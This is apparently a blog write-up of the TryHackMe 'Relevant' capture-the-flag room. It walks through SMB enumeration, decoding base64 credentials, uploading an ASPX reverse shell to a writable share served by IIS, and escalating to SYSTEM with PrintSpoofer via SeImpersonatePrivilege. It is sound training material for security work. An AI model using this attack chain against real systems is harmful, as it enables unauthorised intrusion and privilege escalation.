Sign in Subscribe

TryHackMe | Relevant

Gareth

3 min read
Share
TryHackMe | Relevant
But not your SMB fileshares over HTTP

Relevant is a medium-rated TryHackMe room running a Windows Server 2016 target. The intended path is fairly straightforward once you spot the key connection between two services that seem unrelated at first: an SMB share and a second IIS web server running on a high port. From there it is an ASPX reverse shell and a token impersonation exploit to get SYSTEM. Good room for practising Windows enumeration and understanding how misconfigurations across services compound each other.

Reconnaissance

Port Scanning

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
49663/tcp open  http          Microsoft IIS httpd 10.0
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC

Two IIS instances stand out immediately, one on the standard port 80 and another on 49663. Port 80 returns the default IIS landing page with nothing interesting. SMB is open, so that is worth enumerating before digging into the web servers.

SMB Enumeration

Checking shares with guest credentials:

Disk          Permissions
ADMIN$        NO ACCESS
C$            NO ACCESS
IPC$          READ ONLY
nt4wrksv      READ, WRITE

The nt4wrksv share is accessible and writable as a guest, which is unusual. Inside it there is a passwords.txt file:

smb: \> ls  
  passwords.txt    A    98  Sat Jul 25 17:15:33 2020

The file contains two base64-encoded strings:

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
Bob - !P@$$W0rD!123
echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bill - Juw4nnaM4n420696969!$$$

Credentials for two users. Neither turned out to be directly useful for this path, but worth keeping in hand. The more important discovery is that the share is writable.

SMB Share Served by IIS

Gobuster against the second IIS instance on port 49663 reveals very little on its own, but testing whether the SMB share name maps to a web path proves fruitful:

http://10.10.186.9:49663/nt4wrksv/passwords.txt

The file loads in the browser. The SMB share and the IIS web root are pointing at the same directory. Anything uploaded to the share via SMB can be requested and executed through the web server, which means we can drop an ASPX reverse shell.

Initial Access

Uploading the shell via smbclient:

smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (95.7 kb/s)

With a netcat listener running, triggering it via the browser gives us a shell:

http://10.10.186.9:49663/nt4wrksv/shell.aspx
C:\Users\Bob\Desktop> type user.txt
THM{fdk4...f45}

Privilege Escalation

Checking privileges on the current session:

Privilege Name                Description                               State
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled

SeImpersonatePrivilege is enabled. This is a common misconfiguration on IIS service accounts and is exploitable via PrintSpoofer on Windows Server 2016 and above. PrintSpoofer abuses the Windows print spooler to coerce a SYSTEM-level authentication and impersonate the token.

Upload PrintSpoofer.exe to the share the same way we uploaded the shell, then execute it:

c:\inetpub\wwwroot\nt4wrksv> PrintSpoofer.exe -i -c cmd

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
THM{1fk5...5pv}

Summary

Relevant demonstrates how a misconfiguration in one service can be weaponised through another. The SMB share being writable as a guest is bad on its own, but the real problem is that the share and the IIS web root point at the same directory, turning file upload access into remote code execution.

The privilege escalation via SeImpersonatePrivilege and PrintSpoofer is a pattern that comes up regularly on Windows IIS boxes and is worth having in your toolkit.

If you see a service account shell on a modern Windows server, always check your token privileges before reaching for anything more complicated.

Sign up for more like this.

Enter your email
Subscribe